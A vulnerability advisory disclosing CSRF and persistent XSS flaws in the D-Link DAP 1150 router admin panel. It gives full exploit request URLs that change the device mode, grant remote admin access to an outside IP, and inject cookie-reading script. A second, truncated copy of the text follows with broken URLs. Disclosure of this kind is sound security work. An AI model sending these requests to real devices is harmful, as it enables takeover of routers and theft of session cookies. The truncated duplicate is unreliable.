In 2011 and beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs2 7440.html, http://securityvulns.ru/docs27 677.html, http://securityvulns.ru/docs27 676.html) in D-Link DAP 1150 (several dozens). That time I wrote about vulnerabilities in admin panel in Access Point mode and now I'll write about holes in Router mode.
I present new vulnerabilities in this device. There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn't fix them.
----------
Details:
----------
I remind you, that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs2 7440.html), I wrote about CSRF in login form and other vulnerabilities, which allow to remotely log into admin panel for conducting CSRF and XSS attacks inside admin panel.
CSRF (WASC-09):
In section Advanced / Device via CSRF it's possible to change device mode. If access point mode is on, then for attack on vulnerabilities in router mode it's needed to turn on this mode.
Turn on access point mode:
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=112&res_struct_s ize=0&res_buf={%22device_mode% 22:%22ap%22}&res_pos=0
Turn on router mode:
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=112&res_struct_s ize=0&res_buf={%22device_mode% 22:%22router%22}&res_pos=0
CSRF (WASC-09):
In section Advanced / Remote access via CSRF it's possible to add, edit and delete settings of remote access to web interface. The next request will allow remote access to admin panel from IP 50.50.50.50.
Add:
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=16&res_struct_si ze=0&res_buf={%22ips%22:%2250. 50.50.50%22,%20%22source_mask% 22:%22255.255.255.0%22,%20% 22sport%22:80,%20%22dport%22:% 2280%22}&res_pos=-1
Edit:
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=16&res_struct_si ze=0&res_buf={%22ips%22:%2250. 50.50.50%22,%20%22source_mask% 22:%22255.255.255.0%22,%20% 22sport%22:80,%20%22dport%22:% 2280%22}&res_pos=0
Delete:
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=2& res_config_id=16&res_struct_si ze=0&res_pos=0
XSS (WASC-08):
These are persistent XSS. The code will execute in section Advanced / Remote access.
Attack via add function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=16&res_struct_si ze=0&res_buf={%22ips%22:%22%3C script%3Ealert(document.cookie )%3C/script%3E%22,%20%22source _mask%22:%22%3Cscript%3Ealert( document.cookie)%3C/script%3E% 22,%20%22sport%22:80,%20% 22dport%22:%2280%22}&res_pos=- 1
Attack via edit function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi? v2=y&rq=y&res_json=y&res_data_ type=json&res_config_action=3& res_config_id=16&res_struct_si ze=0&res_buf={%22ips%22:%22%3C script%3Ealert(document.cookie )%3C/script%3E%22,%20%22source _mask%22:%22%3Cscript%3Ealert( document.cookie)%3C/script%3E% 22,%20%22sport%22:80,%20% 22dport%22:%2280%22}&res_pos=0
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/713 7/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
I present new vulnerabilities in this device. There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn't fix them.
----------
Details:
----------
I remind you, that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs2
CSRF (WASC-09):
In section Advanced / Device via CSRF it's possible to change device mode. If access point mode is on, then for attack on vulnerabilities in router mode it's needed to turn on this mode.
Turn on access point mode:
http://192.168.0.50/index.cgi?
Turn on router mode:
http://192.168.0.50/index.cgi?
CSRF (WASC-09):
In section Advanced / Remote access via CSRF it's possible to add, edit and delete settings of remote access to web interface. The next request will allow remote access to admin panel from IP 50.50.50.50.
Add:
http://192.168.0.50/index.cgi?
Edit:
http://192.168.0.50/index.cgi?
Delete:
http://192.168.0.50/index.cgi?
XSS (WASC-08):
These are persistent XSS. The code will execute in section Advanced / Remote access.
Attack via add function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?
Attack via edit function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/713
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua